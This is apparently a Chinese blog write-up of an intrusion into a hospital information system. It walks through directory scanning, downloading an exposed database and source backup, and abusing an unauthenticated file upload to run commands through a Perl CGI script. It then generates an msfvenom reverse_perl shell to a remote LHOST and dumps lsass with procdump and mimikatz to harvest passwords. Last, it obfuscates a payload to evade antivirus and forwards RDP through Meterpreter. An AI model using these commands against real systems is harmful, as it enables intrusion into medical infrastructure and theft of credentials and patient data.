前言
大多数遇到的HIS系统为CS架构,从不以为然。而这次测试发现该HIS系统为BS架构,非常有趣。平时不多见,在此记录一下~
信息收集
IP:202.194.xx.xxx
开放82端口。
image.png
竟然是XAMPP,扫一下目录吧。说不定会遇到phpmyadmin。
image.png
不幸的是phpmyadmin为403禁止访问,看一下down目录吧
image.png
还真有东西。而且好像是HIS系统。
his.db为数据库文件,his.tar是his系统文件的备份。
image.png
下载his.tar备份进行查看。竟然是perl语言(话说这个语言不大多在linux下运行么)
使用SQLite数据库
image.png
部署在windows7上
image.png
文件上传
翻找源文件查看到首页地址。
image.png
尝试登录了几次遂放弃。
直接搜索uplaod关键字,看是否存在文件上传。
image.png
竟然可以未授权文件上传。且没有任何过滤。
image.png
因为使用了XAMPP安装包,猜测支持php语言。上传php文件没有解析,真是神奇。
没有办法,硬着头皮根据下载的源码进行修改,不会perl语言的我只会简单地执行系统命令。
源码为:
#!"D:\Strawberry\perl\bin\perl"
# 上传文件的程序,用来单位上统一收集文件。
print "Content-type: text/html\n\n";
$files_print = `whoami`;
print "<pre> $files_print </pre>";
image.png
但是这样通过文件上传来执行命令,太麻烦啦。
想直接使用msfvenom生成的perl木马,访问后上线。但访问后服务器500。
msfvenom -p cmd/unix/reverse_perl LHOST=144.xxx.xxx.xxx LPORT=2333 -f raw > shell.pl
最终在github上找到一个大佬的perl大马,终于可以正常执行。
perl大马
image.png
IP为内网。使用msf马,上线后转发3389端口即可登录。
tasklist
查看进程发现存在多个防护。添加用户是不可能啦。
还是老办法。prodump+mimikatz完美绕过。
procdump.exe -accepteula -ma lsass.exe lsass.dmp
image.png
再在本地上使用mimikatz读取。
(系统竟然是windows7 32位的,导致浪费了一些时间)
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
image.png
ok!有了密码,静待登录。
msf上线
对exe木马进行免杀处理,执行后可成功上线。
image.png
端口转发3396远程桌面。
portfwd add -l 3396 -r 192.168.0.6 -p 3396
image.png
在登录时,使用windows远程连接时,出现"由于数据加密错误,这个会话将结束。请重新连接到远程计算机"。改用kali的rdesktop命令可解决该问题。
网友评论